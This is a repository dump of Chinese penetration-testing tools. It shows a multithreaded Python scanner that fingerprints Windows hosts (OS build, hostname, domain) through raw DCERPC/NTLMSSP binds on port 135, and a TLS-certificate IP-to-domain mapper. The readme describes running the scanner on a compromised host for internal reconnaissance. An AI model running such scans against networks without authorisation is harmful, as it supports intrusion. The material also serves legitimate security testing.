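├── Dcerpc_Find_OSInfo ├── Dcerpc_Find_OSInfo.py ├── Readme.md └── images │ ├── 640-16432009920046-16444876053855.webp │ ├── 640-16432009920047-16444876053866.webp │ ├── Z2Oqq二维码4-16814031792311.jpg │ ├── Z2Oqq二维码4.jpg │ ├── Z2O安全攻防交流②群群聊二维码-16814031792322.png │ ├── Z2O安全攻防交流②群群聊二维码.png │ ├── Z2O安全攻防交流群群聊qq二维码.png │ ├── image-20220427110933992.png │ ├── image-20220427111016139.png │ ├── image-20220527180040876.png │ ├── image-20220528161243239.png │ ├── image-20220528185933039.png │ ├── image-20220528193253307.png │ ├── image-20230414002829568.png │ └── 公众号.jpg ├── Ip2domain ├── images │ ├── 640-16432009920046-16444876053855.webp │ ├── 640-16432009920047-16444876053866.webp │ ├── Z2O安全攻防交流群群聊qq二维码.png │ ├── image-20220427110933992.png │ ├── image-20220427111016139.png │ ├── image-20220612125013941.png │ ├── image-20220612175433669.png │ ├── image-20220612181909329.png │ ├── 公众号.jpg │ └── 微信图片_20220427110850.jpg ├── ip2domain.py └── readme.md ├── MyInteractive_SSH.py ├── MyMultithreadPing.py ├── MyNointeractive_SSH.py ├── MyNslookup.py ├── MyNslookup2.py ├── My_dirscan.py ├── Mybruster.py ├── Mybruster_SNMP 函数版.py ├── Mybruster_SSH.py ├── Mybruster_ftp 函数版.py ├── Mybruster_phpmyadmin.py ├── Mybruster_phpmyadmin单线程版.py ├── MybypassAV_ps1.py ├── MybypassAV_ps1初版.py ├── Myportscan.py ├── Myportscan2.py ├── Myportscan单线程函数版.py ├── Myportscan端口扫描 扫描封装到类单线程版本.py ├── Myportscan端口探测封装到类版.py ├── Mywebscan.py ├── images ├── 640-16432009920046.webp ├── 640-16432009920047.webp ├── 640-16432009920048.webp ├── Z2O安全攻防交流群群聊qq二维码.png ├── image-20220427111016139.png ├── 公众号.jpg └── 微信图片_20220427110850.jpg └── readme.md /Dcerpc_Find_OSInfo/Dcerpc_Find_OSInfo.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author:Komomon
# @Time:2022/5/27 17:32

'''
Full version.
Probe remote host information through DCERPC + NTLMSSP.

usage
python3 Dcerpc_Find_OSInfo.py -i 192.168.31
python3 Dcerpc_Find_OSInfo.py -i ip.txt
python3 Dcerpc_Find_OSInfo.py -i 192.168.1.1-192.168.2.2


'''
# NOTE: the original file had a bare line here ("域控原本IP" -- "DC original IP"),
# which Python treats as an undefined name and raised NameError at import time.
from __future__ import annotations

from argparse import ArgumentParser, FileType
from base64 import b64encode
from queue import Queue
from threading import Thread
import binascii
import logging
import socket
import sys
import time

TIME_OUT = 3       # seconds; applied to every TCP socket opened below
RESULT_LIST = []   # one {ip: osinfo} dict per host that answered; filled by worker threads
length = 0         # legacy parse cursor for attribute_name(); get_osinfo() no longer uses it

# Offsets into the reply to the NTLMSSP bind, exactly as the original script
# computed them: 0xa0 - 54 == 106, with the Version field read at +10..+18 and
# the TargetInfo length at +2..+4.  These were derived from captures, not from
# a spec constant -- confirm against the NTLM CHALLENGE_MESSAGE layout if the
# reply shape ever changes.
_NTLM_BASE = int('0xa0', 16) - 54
_MIN_REPLY_LEN = _NTLM_BASE + 18

# NTLM AV_PAIR AvId values (MS-NLMP) mapped to this script's output keys, and
# the order in which they are printed/written.  The original assigned the
# pairs positionally, which mislabels them whenever the server emits them in
# a different order.
_AV_ID_TO_KEY = {
    0x0001: "NetBIOS_computer_name",
    0x0002: "NetBIOS_domain_name",
    0x0003: "DNS_computer_name",
    0x0004: "DNS_domain_name",
    0x0005: "DNS_tree_name",
}
_OUTPUT_KEYS = (
    "NetBIOS_domain_name",
    "NetBIOS_computer_name",
    "DNS_domain_name",
    "DNS_computer_name",
    "DNS_tree_name",
)

# DCERPC bind proposing the NDR64 transfer syntax; a reply echoing that UUID is
# taken as "64-bit host".
_BIND_NDR64 = b"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa\x03\x00\x00\x00\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36\x01\x00\x00\x00"
_NDR64_SYNTAX = b"\x33\x05\x71\x71\xBA\xBE\x37\x49\x83\x19\xB5\xDB\xEF\x9C\xCC\x36"
# DCERPC bind carrying an NTLMSSP NEGOTIATE; the server answers with a
# CHALLENGE that includes its version and TargetInfo.
_BIND_NTLMSSP = b"\x05\x00\x0b\x03\x10\x00\x00\x00\x78\x00\x28\x00\x03\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x01\x00\xa0\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00\x0a\x02\x00\x00\x00\x00\x00\x00\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x01\xb1\x1d\x00\x00\x00\x0f"


def _ip_to_int(ip: str) -> int:
    """Convert dotted-quad text to its integer value (validation is only int())."""
    return sum(256 ** j * int(octet) for j, octet in enumerate(ip.split('.')[::-1]))


def _int_to_ip(num: int) -> str:
    """Inverse of _ip_to_int for a 32-bit value."""
    return '.'.join(str((num >> (8 * i)) & 0xFF) for i in range(3, -1, -1))


def get_ip_list(ip) -> list:
    """Expand an -i argument into a list of dotted-quad strings.

    Accepted forms (unchanged from the original):
      * "a.b.c.d-e.f.g.h"  inclusive range, at most 65536 addresses
      * "<path>.txt"       one argument per line, each expanded recursively
      * "a.b"              a.b.1-254.1-254 ; "a.b.c"  a.b.c.1-254
      * "a.b.c.d"          that single address
    Anything else prints "-i wrong format" and contributes nothing.
    """
    ip_list = []
    if '-' in ip:
        start_text, end_text = ip.split('-', 1)
        ip_start = _ip_to_int(start_text)
        ip_end = _ip_to_int(end_text)
        if 0 <= ip_end - ip_start <= 65536:
            ip_list.extend(_int_to_ip(n) for n in range(ip_start, ip_end + 1))
        else:
            print('-i wrong format')
    elif '.txt' in ip:
        # with-block: the original closed the handle manually and leaked it
        # when a line failed to parse.
        with open(ip, 'r') as ip_config:
            for line in ip_config:
                line = line.strip()
                if line:
                    ip_list.extend(get_ip_list(line))
    else:
        octets = ip.split('.')
        if len(octets) == 2:
            ip_list.extend("%s.%s.%d.%d" % (octets[0], octets[1], b, c)
                           for b in range(1, 255) for c in range(1, 255))
        elif len(octets) == 3:
            ip_list.extend("%s.%s.%s.%d" % (octets[0], octets[1], octets[2], c)
                           for c in range(1, 255))
        elif len(octets) == 4:
            ip_list.append(ip)
        else:
            print("-i wrong format")
    return ip_list


def _read_av_pair(target_info: bytes, offset: int) -> tuple[int, str, int]:
    """Decode one NTLM AV_PAIR (AvId u16, AvLen u16, UTF-16LE value) at *offset*.

    Returns (av_id, value, next_offset).  Raises IndexError on a truncated
    buffer so callers can treat the reply as malformed.
    """
    if offset + 4 > len(target_info):
        raise IndexError("AV_PAIR header past end of TargetInfo")
    av_id = int.from_bytes(target_info[offset:offset + 2], byteorder='little')
    av_len = int.from_bytes(target_info[offset + 2:offset + 4], byteorder='little')
    start, end = offset + 4, offset + 4 + av_len
    if end > len(target_info):
        raise IndexError("AV_PAIR value past end of TargetInfo")
    # The original stripped NUL bytes and used unicode_escape, which only
    # round-trips ASCII names; the field is UTF-16LE.
    value = target_info[start:end].decode('utf-16-le', errors='replace')
    return av_id, value, end


def attribute_name(Target_Info_bytes):
    """Legacy helper: return the next AV_PAIR value using the module-level cursor.

    Kept for compatibility only.  It shares the global ``length`` between all
    callers, so it is not safe from get_osinfo()'s worker threads -- the
    original used it there and the cursor was clobbered across hosts.
    """
    global length
    _, att_name, length = _read_av_pair(Target_Info_bytes, length)
    return att_name


def _parse_target_info(target_info: bytes) -> dict:
    """Walk the AV_PAIR list and return the fields this script reports.

    Stops at MsvAvEOL (AvId 0) or the end of the buffer; unknown AvIds are
    skipped.  Fields that are absent stay "" so the output layout is stable.
    """
    osinfo = {key: "" for key in _OUTPUT_KEYS}
    offset = 0
    while offset + 4 <= len(target_info):
        av_id, value, offset = _read_av_pair(target_info, offset)
        if av_id == 0:
            break
        key = _AV_ID_TO_KEY.get(av_id)
        if key is not None and not osinfo[key]:
            osinfo[key] = value
    return osinfo


def send_packet(ip):
    """Bind to the endpoint mapper on ip:135 once and guess the architecture.

    Returns "x64" when the reply contains the NDR64 transfer-syntax UUID the
    bind proposed, "x86" otherwise, and -1 if the host did not answer within
    TIME_OUT.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.settimeout(TIME_OUT)
        sock.connect((ip, 135))
        sock.sendall(_BIND_NDR64)
        packet1 = sock.recv(1024)
    except OSError:
        return -1
    finally:
        sock.close()
    return "x64" if _NDR64_SYNTAX in packet1 else "x86"


def get_osinfo(ip):
    """Send the NTLMSSP bind to ip:135 and parse the challenge it returns.

    Prints the findings and returns {ip: osinfo}; returns -1 when the host
    does not answer or the reply does not look like an NTLM challenge.
    All parse state is local, so this is safe to run from many threads.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.settimeout(TIME_OUT)
        sock.connect((ip, 135))
        sock.sendall(_BIND_NTLMSSP)
        packet2 = sock.recv(4096)
    except OSError:
        return -1
    finally:
        sock.close()

    # Reject short or foreign replies before indexing into them.
    if len(packet2) < _MIN_REPLY_LEN or b"NTLMSSP\x00" not in packet2:
        return -1
    try:
        digit = send_packet(ip)
        arch = digit if digit != -1 else "unknown"   # the original printed "-1" here
        # Version field: major, minor, build (u16 LE); byte 7 is the NTLM
        # revision, read but not reported by the original.
        version = packet2[_NTLM_BASE + 10:_NTLM_BASE + 18]
        major = version[0]
        minor = version[1]
        build = int.from_bytes(version[2:4], byteorder='little')
        os_version = "Windows Version {0}.{1} Build {2} {3}".format(major, minor, build, arch)

        target_info_len = int.from_bytes(packet2[_NTLM_BASE + 2:_NTLM_BASE + 4], byteorder='little')
        if target_info_len < 4 or target_info_len > len(packet2):
            return -1
        # The last four bytes are the terminating MsvAvEOL pair (0x00000000).
        target_info = packet2[-target_info_len:-4]
        osinfo = _parse_target_info(target_info)
    except (IndexError, ValueError):
        return -1

    # Key spelling "OS_Verison" is kept: it is part of the written output format.
    osinfo["OS_Verison"] = os_version
    lines = ["[*] " + ip, "\t[->] OS_Verison : " + os_version]
    lines.extend("\t[->] %s : %s" % (k, v) for k, v in osinfo.items() if k != "OS_Verison")
    print("\n".join(lines))   # one print per host keeps thread output from interleaving
    return {ip: osinfo}


def worker(q):
    """Queue consumer: probe each ip and collect successful results.

    Runs forever as a daemon thread.  Every item is acknowledged with
    task_done(), even when the probe raises, so q.join() in main() cannot hang.
    """
    while True:
        ip = q.get()
        try:
            result = get_osinfo(ip)
            if result != -1:
                RESULT_LIST.append(result)   # list.append is atomic in CPython
        except Exception as e:   # keep the worker alive; report and move on
            sys.stderr.write("%s: %s\n" % (ip, e))
        finally:
            q.task_done()


def main():
    """CLI entry point: parse arguments, fan out probes, write results to --output."""
    parser = ArgumentParser()
    parser.add_argument('-i', '--ip', help=u'IP Address', required=True)
    parser.add_argument('-t', '--threads', help=u'threads', default=20, type=int)
    parser.add_argument('-o', '--output', help=u'Output result', default='log.txt', type=FileType('a+'))
    args = parser.parse_args()

    # -t 0 would create an unbounded queue with no consumer and hang on join().
    threads = max(1, args.threads)
    q = Queue(threads)
    for _ in range(threads):
        t = Thread(target=worker, args=(q,))
        t.daemon = True
        t.start()

    for target in get_ip_list(args.ip):
        q.put(target)
    q.join()

    # argparse opened the file; close it here so results are flushed to disk
    # even if a write fails part-way.
    with args.output as out:
        for osinfo_dict in RESULT_LIST:
            for ip, osinfo in osinfo_dict.items():
                out.write("[*] " + ip + "\n")
                for k, v in osinfo.items():
                    out.write("\t[->] " + k + ":" + v + "\n")


if __name__ == '__main__':
    main()
-------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/Readme.md: -------------------------------------------------------------------------------- 1 | # 通过dcerpc和ntlmssp获取Windows远程主机信息 2 | 3 | **欢迎star:star: O(∩_∩)O** 4 | 5 | ## 成果 6 | 7 | 首先看一下成果,通过DCERPC协议的ping附带NTLMSSP 可以获取到目标的版本号主机名,域名,DNS等信息。 8 | 9 | ![image-20220528193253307](images/image-20220528193253307.png) 10 | 11 | 12 | 13 | ## 初衷 14 | 15 | 想自己实现一下,,同时因为通过rpc进行探测的工具,大部分都是依托impacket来实现,而实战中通过挂代理进行内网探测速率和准确度都比较低,所以最好的方法是将脚本放到目标主机上,来进行内网探测信息收集,所以本文关注的点是想办法脱离impacket,在Socket RAW上的实现,这样能够减小工具的体积,并且其他语言也能够轻松复刻整个过程,便于应用到实战中。 16 | 17 | ## 协议介绍-RPC 18 | 19 | RPC(Remote Procedure Call)远程过程调用协议,一种通过网络从远程计算机上请求服务,而不需要了解底层网络技术的协议。RPC它假定某些协议的存在,例如TCP/UDP等,为通信程序之间携带信息数据。在OSI网络七层模型中,RPC跨越了传输层和应用层,RPC使得开发,包括网络分布式多程序在内的应用程序更加容易。 20 | 21 | ## 原理 22 | 23 | 通过DCERPC协议的ping附带NTLMSSP则目标会在响应包中包含自己的版本号,主机名,域名,DNS等信息。 24 | 25 | **域内主机:** 26 | 27 | ![image-20220527180040876](images/image-20220527180040876.png) 28 | 29 | **工作组主机:** 30 | 31 | ![image-20220528161243239](images/image-20220528161243239.png) 32 | 33 | 34 | 35 | 36 | 37 | ## 写成脚本 38 | 39 | 根据上面的分析,写成了多线程的脚本, 多线程实现扫描效果如下: 40 | 41 | ![image-20220528193253307](images/image-20220528193253307.png) 42 | 43 | 域内主机的话会显示域名,主机名,操作系统版本架构等信息,工作组主机则信息都是自己的主机名。 44 | 45 | 46 | 47 | ## Usage 48 | 49 | ![image-20220528185933039](images/image-20220528185933039.png) 50 | 51 | ```java 52 | python3 Dcerpc_Find_OSInfo.py -i 192.168.31 53 | python3 Dcerpc_Find_OSInfo.py -i ip.txt 54 | python3 Dcerpc_Find_OSInfo.py -i 192.168.1.1-192.168.2.2 55 | python3 Dcerpc_Find_OSInfo.py -i 192.168.1.1-192.168.2.2 -t 20 # 默认线程15,默认将结果输出到log.txt 56 | python3 Dcerpc_Find_OSInfo.py -i 192.168.1.1-192.168.2.2 -t 20 -o result.txt 57 | ``` 58 | 59 | 60 | 61 | ## 一起交流 62 | 63 | 感兴趣的可以关注 **Z2O安全攻防** 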
公众号回复“**加群**”,添加Z2OBot 小K自动拉你加入**Z2O安全攻防交流群**分享更多好东西。 64 | 65 | ![image-20220427110933992](images/image-20220427110933992.png) 66 | 67 | ![公众号](images/公众号.jpg) 68 | 69 | **知识星球** 70 | 71 | 团队建立了知识星球,不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试骚操作。感兴趣的可以加一下。 72 | 73 | ![image-20220427111016139](images/image-20220427111016139.png) 74 | 75 | ![图片](images/640-16432009920046-16444876053855.webp) 76 | 77 | ![图片](images/640-16432009920047-16444876053866.webp) 78 | 79 | ![image-20230414002829568](images/image-20230414002829568.png) 80 | 81 | ![Z2Oqq二维码4](images/Z2Oqq二维码4-16814031792311.jpg) 82 | 83 | **欢迎star:star: O(∩_∩)O** 84 | 85 | 86 | 87 | -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/640-16432009920046-16444876053855.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/640-16432009920046-16444876053855.webp -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/640-16432009920047-16444876053866.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/640-16432009920047-16444876053866.webp -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/Z2Oqq二维码4-16814031792311.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/Z2Oqq二维码4-16814031792311.jpg -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/Z2Oqq二维码4.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/Z2Oqq二维码4.jpg -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/Z2O安全攻防交流②群群聊二维码-16814031792322.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/Z2O安全攻防交流②群群聊二维码-16814031792322.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/Z2O安全攻防交流②群群聊二维码.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/Z2O安全攻防交流②群群聊二维码.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/Z2O安全攻防交流群群聊qq二维码.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/Z2O安全攻防交流群群聊qq二维码.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220427110933992.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220427110933992.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220427111016139.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220427111016139.png 
-------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220527180040876.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220527180040876.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220528161243239.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220528161243239.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220528185933039.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220528185933039.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20220528193253307.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20220528193253307.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/image-20230414002829568.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/image-20230414002829568.png -------------------------------------------------------------------------------- /Dcerpc_Find_OSInfo/images/公众号.jpg: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Dcerpc_Find_OSInfo/images/公众号.jpg -------------------------------------------------------------------------------- /Ip2domain/images/640-16432009920046-16444876053855.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/640-16432009920046-16444876053855.webp -------------------------------------------------------------------------------- /Ip2domain/images/640-16432009920047-16444876053866.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/640-16432009920047-16444876053866.webp -------------------------------------------------------------------------------- /Ip2domain/images/Z2O安全攻防交流群群聊qq二维码.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/Z2O安全攻防交流群群聊qq二维码.png -------------------------------------------------------------------------------- /Ip2domain/images/image-20220427110933992.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/image-20220427110933992.png -------------------------------------------------------------------------------- /Ip2domain/images/image-20220427111016139.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/image-20220427111016139.png 
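-------------------------------------------------------------------------------- /Ip2domain/images/image-20220612125013941.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/image-20220612125013941.png -------------------------------------------------------------------------------- /Ip2domain/images/image-20220612175433669.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/image-20220612175433669.png -------------------------------------------------------------------------------- /Ip2domain/images/image-20220612181909329.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/image-20220612181909329.png -------------------------------------------------------------------------------- /Ip2domain/images/公众号.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/公众号.jpg -------------------------------------------------------------------------------- /Ip2domain/images/微信图片_20220427110850.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/Ip2domain/images/微信图片_20220427110850.jpg -------------------------------------------------------------------------------- /Ip2domain/ip2domain.py: --------------------------------------------------------------------------------
import argparse
import datetime
import os
import re
import socket
import ssl
import threading
from queue import Empty, Queue

import OpenSSL.crypto as crypto


class Handle_Data:
    """Read targets from a file into a queue and report each IP's TLS certificate CN.

    One instance is shared by the producer and every consumer thread; the
    queue is the only hand-off point, so consumers must cope with it being
    drained concurrently (see start()).
    """

    def __init__(self, queue=None, file=None, outputfile=None):
        self.queue = queue              # queue.Queue of input lines
        self.file = file                # path of the target list
        self.outputfile = outputfile    # result path, or None to print only
        self._write_lock = threading.Lock()   # serialises appends to outputfile

    def producer(self):
        """Push every non-empty line of self.file onto the queue.

        The original tested ``ll is not None``, which str.strip() can never
        fail, so blank lines were enqueued and later reported as domains.
        """
        with open(self.file, 'r') as f:
            for line in f:
                target = line.strip()
                if target:
                    self.queue.put(target)

    def handle_data(self, line, outputfile=None):
        """Resolve one target line and print/append the result.

        An IPv4 literal (optionally ``ip:port``, default 443) is connected to
        over TLS with verification disabled -- the certificate is only read,
        never trusted -- and its subject CN is reported.  Any other line is
        reported as a bare domain with no lookup.
        """
        ipstr = re.findall(r'\b(?:\d{1,3}\.){3}\d{1,3}:?\d{0,5}\b', line)
        if ipstr:
            # Split the matched token, not the whole line, so a ':' elsewhere
            # in the line cannot break the unpack below.
            if ":" in ipstr[0]:
                ip, port = ipstr[0].split(":", 1)
            else:
                ip, port = ipstr[0], 443
            try:
                dst = (ip, int(port))   # "1.2.3.4:" matches the regex with an empty port
                with socket.create_connection(dst, timeout=1) as raw:
                    ctx = ssl.create_default_context()
                    ctx.check_hostname = False
                    ctx.verify_mode = ssl.CERT_NONE   # harvesting the cert, not authenticating the peer
                    with ctx.wrap_socket(raw, server_hostname=dst[0]) as tls:
                        cert_bin = tls.getpeercert(True)
                x509 = crypto.load_certificate(crypto.FILETYPE_ASN1, cert_bin)
                # CN may be absent (SAN-only certificates); str() avoids a TypeError.
                msg = "IP : " + str(ip) + " || Cert name: " + str(x509.get_subject().CN) + ""
            except (OSError, ValueError, crypto.Error):
                msg = "IP : " + str(ip) + " || No cert"
        else:
            msg = "Domain: " + line + " || No cert"
        print(msg)
        if outputfile is not None:
            with self._write_lock, open(outputfile, "a", encoding="utf-8") as g:
                g.write(msg + "\n")

    def start(self):
        """Consumer loop: drain the queue until it is empty.

        A non-blocking get replaces ``while not queue.empty()``: two consumers
        racing for the last item could otherwise leave one blocked forever.
        """
        while True:
            try:
                line = self.queue.get(block=False)
            except Empty:
                return
            self.handle_data(line, self.outputfile)


def iter_count(file_name):
    """Return the number of lines in *file_name*.

    Counting newline characters (the original approach) misses a last line
    without a trailing newline, which could drive the thread count to zero.
    """
    with open(file_name) as f:
        return sum(1 for _ in f)


if __name__ == '__main__':
    logo = """

██▓ ██▓███ ▓█████▄ ▒█████ ███▄ ▄███▓ ▄▄▄ ██▓ ███▄ █
▓██▒▓██░ ██▒ ▒██▀ ██▌▒██▒ ██▒▓██▒▀█▀ ██▒▒████▄ ▓██▒ ██ ▀█ █
▒██▒▓██░ ██▓▒ ░██ █▌▒██░ ██▒▓██ ▓██░▒██ ▀█▄ ▒██▒▓██ ▀█ ██▒
░██░▒██▄█▓▒ ▒ ░▓█▄ ▌▒██ ██░▒██ ▒██ ░██▄▄▄▄██ ░██░▓██▒ ▐▌██▒
░██░▒██▒ ░ ░ ░▒████▓ ░ ████▓▒░▒██▒ ░██▒ ▓█ ▓██▒░██░▒██░ ▓██░
░▓ ▒▓▒░ ░ ░ ▒▒▓ ▒ ░ ▒░▒░▒░ ░ ▒░ ░ ░ ▒▒ ▓▒█░░▓ ░ ▒░ ▒ ▒
▒ ░░▒ ░ ░ ▒ ▒ ░ ▒ ▒░ ░ ░ ░ ▒ ▒▒ ░ ▒ ░░ ░░ ░ ▒░
▒ ░░░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░
░ By Komomon
"""

    print(logo)
    ttime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
    usage = """
python3 {0} -f file.txt
""".format(os.path.basename(__file__))
    parser = argparse.ArgumentParser(usage=usage)
    parser.add_argument("-f", "--file", default=None, dest="file", help="the url file")
    parser.add_argument("-o", "--output", default=ttime + "_result.txt", dest="output", help="the result file")
    parser.add_argument("-t", "--thread", type=int, default=10, dest="threads", help="Threads num, default 10")
    args = parser.parse_args()
    file = args.file
    outputfile = args.output
    Thread_maxnum = args.threads
    print("[+] {0} starting...".format(ttime))

    if file is not None:
        lines = iter_count(file)
        # Never more consumers than targets, but always at least one.
        Thread_maxnum = max(1, min(Thread_maxnum, lines))
        URL_QUEUE = Queue()
        Object = Handle_Data(queue=URL_QUEUE, file=file, outputfile=outputfile)

        # Fill the queue before any consumer starts.  Consumers stop as soon
        # as they see an empty queue, so running the producer as a sibling
        # thread (the original design) let them exit before work arrived.
        Object.producer()
        print("[+] Threads num:", Thread_maxnum)
        thread_list = [threading.Thread(target=Object.start) for _ in range(Thread_maxnum)]
        for thread in thread_list:
            thread.start()
        for thread in thread_list:
            thread.join()
    else:
        print("Please use -h see usage!")
        raise SystemExit(1)
    ttime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
    print("[+] result: {0}".format(outputfile))
    print("[+] {0} finished!".format(ttime))
-------------------------------------------------------------------------------- /Ip2domain/readme.md: -------------------------------------------------------------------------------- 1 | # ip2domain 2 | 3 | 通过ssl证书,批量ip反查域名工具。 4 | 5 | ## Usage 6 | 7 | ``` 8 | usage: 9 | python3 ip2domain.py -f file.txt 10 | 11 | 12 | optional arguments: 13 | -h, --help show this help message and exit 14 | -f FILE, --file FILE the url file 15 | -o OUTPUT, --output OUTPUT 16 | the result file 17 | -t THREADS, --thread THREADS 18 | Threads num, defalut 10 19 | ``` 20 | 21 | 文件内容格式: 22 | 23 | ``` 24 | 121.40.43.188 25 | 121.40.43.188 26 | 121.40.43.189:8080 27 | www.cnblogs.com 28 | ``` 29 | 30 | 31 | 32 | ![image-20220612175433669](images/image-20220612175433669.png) 33 | 34 | 默认结果存储到当前时间的txt文件中 35 | 36 | ![image-20220612181909329](images/image-20220612181909329.png) 37 | 38 | ![image-20220612125013941](images/image-20220612125013941.png) 39 | 40 | ## 一起交流 41 | 42 | 感兴趣的可以关注 **Z2O安全攻防** 公众号回复“**加群**”,添加Z2OBot 小K自动拉你加入**Z2O安全攻防交流群**分享更多好东西。 43 | 44 | ![image-20220427110933992](images/image-20220427110933992.png) 45 | 46 | ![公众号](images/公众号.jpg) 47 | 48 | ![Z2O安全攻防交流群群聊qq二维码](images/Z2O安全攻防交流群群聊qq二维码.png) 49 | 50 | 51 | 52 | 团队建立了知识星球,不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试骚操作。感兴趣的可以加一下。 53 | 54 | ![image-20220427111016139](images/image-20220427111016139.png) 55 | 56 | ![图片](images/640-16432009920046-16444876053855.webp) 57 | 58 | 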